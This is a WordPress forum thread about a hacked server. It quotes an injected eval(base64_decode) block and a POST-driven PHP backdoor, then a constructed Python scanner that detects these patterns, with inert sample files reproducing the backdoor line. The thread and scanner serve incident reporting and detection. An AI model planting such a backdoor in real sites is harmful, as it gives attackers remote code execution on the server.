
Search and Replace
Possible security issue in "search and replace" 2.6 (4 posts)

  1. louisremi
    Member
    Posted 1 year ago #

    Hi,

    One of the servers I'm administrating was corrupted. We aren't exactly sure about what happened yet but here's what we've found:
    - There's a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    - There's a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    - There are several plugins installed on this WordPress, including "search and replace", but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgx

    I just wanted to let you know and see if other users had similar troubles.

    http://wordpress.org/extend/plugins/search-and-replace/

  2. NFWRo
    Member
    Posted 1 year ago #

    Hi
    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?

  3. louisremi
    Member
    Posted 1 year ago #

    Hi,

    We haven't been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

  4. NFWRo
    Member
    Posted 1 year ago #

    Thanks for the update - that's good to know.

Topic Closed

This topic has been closed to new replies.
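
A triage scan for the three observations in the first post (one injected block at the top of each file, a request-fed eval backdoor, and one file with many blocks), as an added example that is not part of the original thread or the plugin's code. The function names, the 64-byte "top of file" threshold and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval(base64_decode(...)) as quoted in the first post; whitespace-tolerant.
INJECTED = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
# Same call fed directly from request data, like the theme backdoor in the post.
REQUEST_FED = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)

def scan_file(path):
    """Return counts of injected blocks for one PHP file, or None if clean."""
    data = Path(path).read_bytes()
    hits = [m.start() for m in INJECTED.finditer(data)]
    if not hits:
        return None
    return {
        "path": str(path),
        "blocks": len(hits),
        # Mass injection prepends one block; the post's plugin file had many.
        "first_at_top": hits[0] < 64,  # assumed threshold
        "request_fed": len(REQUEST_FED.findall(data)),
        "mtime": Path(path).stat().st_mtime,  # useful for building a timeline
    }

def scan_tree(root):
    """Scan every *.php under root; request-fed and multi-block files sort first."""
    found = [r for p in sorted(Path(root).rglob("*.php")) if (r := scan_file(p))]
    return sorted(found, key=lambda r: (-r["request_fed"], -r["blocks"], r["path"]))

def build_sample_tree(root):
    """Constructed sample files mirroring the three observations in the post."""
    block = b'<?php eval(base64_decode("UExBQ0VIT0xERVI=")); ?>\n'  # constructed, inert
    root = Path(root)
    (root / "index.php").write_bytes(block + b"<?php echo 'home'; ?>\n")
    (root / "theme.php").write_bytes(
        block + b'<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>\n')
    (root / "search-and-replace.php").write_bytes(
        block + b"<?php function a(){} ?>\n" + block + b"<?php function b(){} ?>\n" + block)
    (root / "clean.php").write_bytes(b"<?php echo base64_decode('aGk='); ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for r in scan_tree(tmp):
            print(r["blocks"], r["request_fed"], r["first_at_top"], Path(r["path"]).name)
```

Comparing the modification times of flagged files against web server access logs helps establish which file was written first.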
